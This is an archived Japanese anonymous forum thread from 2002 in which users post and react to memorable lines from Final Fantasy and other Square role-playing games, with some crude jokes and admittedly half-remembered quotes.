花売らないで春売らねえか?

180 ::02/08/18 03:21 ID:???
すりつぶすわよ

181 :名前が無い@ただの名無しのようだ:02/08/18 03:57 ID:???
>>179
(゚∀゚)ヒャッヒャッヒャッ

182 :名前が無い@ただの名無しのようだ:02/08/19 01:05 ID:pchAGnQ4
FF6の帝国兵「焼け死ね。」 かなり怖え

183 :名前が無い@ただの名無しのようだ:02/08/19 02:33 ID:???
アーロン
「泣き虫だと聞いていたが」

ティーたん可愛いなぁ…(;´Д`)ハァハァ

184 :名前が無い@ただの名無しのようだ:02/08/19 09:43 ID:???
ティーダ
「子供の頃は、泣き虫だった・・・。今も泣き虫かな」

185 :名前が無い@ただの名無しのようだ:02/08/19 09:58 ID:4O6fY6v7
ジェクト
「こうやるんですよ」
かんどうした

186 :名前が無い@ただの名無しのようだ:02/08/19 10:02 ID:???
何が特別だってんだ

187 :魔導列車掌 ◆SLvYB9qY :02/08/19 12:29 ID:???
ダイン
「与えられるものは銃弾と不条理・・・
 残されたのは絶望と無の世界・・・
 それだけだ

トライガンを彷彿とさせますね(微妙に間違っているかも・・・)

188 :名前が無い@ただの名無しのようだ:02/08/19 16:43 ID:???
かかってこいや。http://www6.ocn.ne.jp/~nabe000/index.html

189 :名前が無い@ただの名無しのようだ:02/08/19 23:54 ID:???
「その時は遠慮なく 俺を斬るがいい! 」


190 :名前が無い@ただの名無しのようだ:02/08/20 03:25 ID:EDi3AtKy
セリフじゃないけど6のエンディングの最後のほうでティナが髪ほどいたとき
なんかすげえジーンときた。かっこよかった。

191 :名前が無い@ただの名無しのようだ:02/08/20 03:28 ID:???
「私のことを好きにな〜れ」だっけ?

192 :名前が無い@ただの名無しのようだ:02/08/20 03:29 ID:yymAWeOe
魚人の「もうおまえたちの時代だ」



193 :名前が無い@ただの名無しのようだ:02/08/20 04:45 ID:grp3ULiC
ユウナ「これからは私たちの時代、だよね?」

いきなり溜め口とはえー度胸しとるやないけ姉ちゃん

194 :115:02/08/20 10:02 ID:???
>>120
大三角島に行くときの船の上のセリス。
その後のロックの発言
「ティナ、シャドウ行くぞ。」

195 :名前が無い@ただの名無しのようだ:02/08/20 14:46 ID:Z9Fq4cUl
>>191
好きにな〜る

196 :名前が無い@ただの名無しのようだ:02/08/20 15:14 ID:ztyk0PA3
FF9のED
最高

197 :名前が無い@ただの名無しのようだ:02/08/20 15:52 ID:???
さあ、どうする!
今こそ決断する時だ!
死んで楽になるか、生きて悲しみと戦うか。
自分の心で感じたままに物語を動かす時だ!

アーロン最高!
セリフがあってるか分からないが

198 :名前が無い@ただの名無しのようだ:02/08/20 17:20 ID:BOxHzq0Q
かみの ちから とくと めにやきつけておけ!!

199 :名前が無い@ただの名無しのようだ:02/08/20 17:37 ID:???
シパーフ乗るぅ〜?
最高。感動した。

200 :名前が無い@ただの名無しのようだ:02/08/20 17:45 ID:???
 思い出したことがあるかい?
 子供の頃を

 その感触
 そのときの言葉
 そのときの気持ち

 大人になっていくにつれ
 何かを残して 何かを捨てていくのだろう

 時間は待ってはくれない
 にぎりしめても
 ひらいたと同時に離れていく

201 :名前が無い@ただの名無しのようだ:02/08/20 18:08 ID:???
「……け、剣はどこだ……?
 どこにある……?
 あいつを…倒さなければ……。
 お願いだ……明かりをくれ……
 真っ暗で…何も見えない………。

から

「ふぅ……、………疲れた…眠い…少し眠るよ……。

まで

202 :名前が無い@ただの名無しのようだ:02/08/20 18:10 ID:???
>>201
あれは本気で泣けた 。・゚・(ノД`)・゚・。


203 :名前が無い@ただの名無しのようだ:02/08/20 18:14 ID:???
名言は
サルーインを「ぶち」殺すだろ?
最終戦前なのに笑ってしまった

204 :名前が無い@ただの名無しのようだ:02/08/20 18:16 ID:Yubfovg3
リオファネス軍騎士
「に……げろ………
 ここ…は…危険………だ………

205 :名前が無い@ただの名無しのようだ:02/08/20 18:55 ID:???
ヴィンセントが最初ルクレツィアって言ってたけどいつのまにかルクレッツィアに
なってたのに気が付いたとき、俺の網膜の奥底へ訴えかけてきた悲しみのパルスが
今でも忘れられない。

206 :名前が無い@ただの名無しのようだ:02/08/20 19:04 ID:1m1QbtKI
興味ないね

207 :名前が無い@ただの名無しのようだ:02/08/20 19:12 ID:sFAULs5/
「とくれせんたぼーび」感動はしないけど名言

208 :名前が無い@ただの名無しのようだ:02/08/20 19:41 ID:2mDbdK5v
FF9のEDらへんが感動しまくり!!

209 :名前が無い@ただの名無しのようだ:02/08/20 19:41 ID:qcJkWiaJ
スコール
「俺は過去形にされるのはごめんだからな!」
うろ覚え。

210 :名前が無い@ただの名無しのようだ:02/08/20 19:45 ID:aIJFcjE7
おれもうる覚えだが、
クラウド
「敷かれたレールの上を走らされてるだけだ」

211 :名前が無い@ただの名無しのようだ:02/08/20 20:15 ID:???
「おれ どうぶつのことば わかる」
「おまえ おいて いけない」

舌足らずなガイ萌え

212 :名前が無い@ただの名無しのようだ:02/08/20 23:16 ID:G5k3Rt/t
「セフィロスは……死んでしまったよルクレッツィア…」

213 :名前が無い@ただの名無しのようだ:02/08/20 23:29 ID:???
すぐに終わらせてやるからな!
さっさとやられろよ!!!

これがFFX最大の名言と思う。

214 :名前が無い@ただの名無しのようだ:02/08/20 23:45 ID:???
きさまがラスボスか!!

215 :名前が無い@ただの名無しのようだ:02/08/21 01:18 ID:PU+BKjO+
俺は利用する側に回ってやる!

216 :名前が無い@ただの名無しのようだ:02/08/21 03:29 ID:???
溶岩よりも熱く、ワインよりも濃き血を…

ワインって言う比喩がカコイイ

217 :名前が無い@ただの名無しのようだ:02/08/21 04:13 ID:xxNa/JUD
>>200
当時の自分にとっちゃあなんか考えさせられたなあ

218 :名前が無い@ただの名無しのようだ:02/08/21 04:56 ID:???
「なぜならクラウド。
 
 
お前は…人形だ。」


ここで名作になりますた

219 :名前が無い@ただの名無しのようだ:02/08/21 06:02 ID:???
すべての記憶 すべての存在
すべての次元を消し
そして私も消えよう
永遠に!!

220 :名前が無い@ただの名無しのようだ:02/08/21 08:49 ID:???
せんしたちは たたかいのきおくを こころのそこに しまいこみ
このせかいを みまもっていくのだろう。

わすれないでほしい。

このせかいの かがやきが いつも ただしい ほうこうに むくように
4つのひかりを まちがった ちからに かえないように

そして しんの4つのクリスタルは いつも そのむねのなかに あることを‥‥

そう 2000ねんの ときをこえ たたかっていたのは きみなのだから。


すべてのものに かがやきを‥‥



221 :名前が無い@ただの名無しのようだ:02/08/21 09:35 ID:???
>>200って何のセリフだっけ?

222 :名前が無い@ただの名無しのようだ:02/08/21 10:32 ID:???
>>221
アルティミシア最終形態。
セリフ自体は深いが、言ってるアルティミシア自身がイマイチようわからんキャラなので、不完全燃焼気味。

223 :名前が無い@ただの名無しのようだ:02/08/21 13:07 ID:???
ユウナ「この裏切り者っ!」
(((( ;゚Д゚)))ガクガクブルブル

224 :名前が無い@ただの名無しのようだ:02/08/21 13:08 ID:94mGXanK
バルバリシア戦でカインが
「空の戦いを制するのはお前だけじゃないぜ!」
みたいなのがなんかカコヨカッタ

225 :名前が無い@ただの名無しのようだ:02/08/21 13:12 ID:vzzXt77w
これはお前の物語だ

226 :名前が無い@ただの名無しのようだ:02/08/21 13:15 ID:???
エアリスが死んだあとのクラウドの台詞

227 :名前が無い@ただの名無しのようだ:02/08/21 13:32 ID:???
クラウド「エアリス・・・最後に口で逝かせてほしかった・・・(涙)」

228 :名前が無い@ただの名無しのようだ:02/08/21 14:34 ID:Rfgmaroy
もうお前達の時代だ

229 :名前が無い@ただの名無しのようだ:02/08/21 14:57 ID:???
ときどきでいいから、いなくなった人たちのこと思い出して

230 :名前が無い@ただの名無しのようだ:02/08/21 18:05 ID:0HhHqyP7
「なに言っているんですか! 戦いは
 まだ終わってないじゃないですかッ!

何のセリフか分かる人いるのかな

231 :名前が無い@ただの名無しのようだ:02/08/21 18:10 ID:???
「俺だけかよ、何も知らなかったの俺だけかよ!」

232 :名無し:02/08/21 18:22 ID:ce4FGiBj
農夫をやっとります

233 :名前が無い@ただの名無しのようだ:02/08/21 18:31 ID:???
俺は誰だ....

38 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)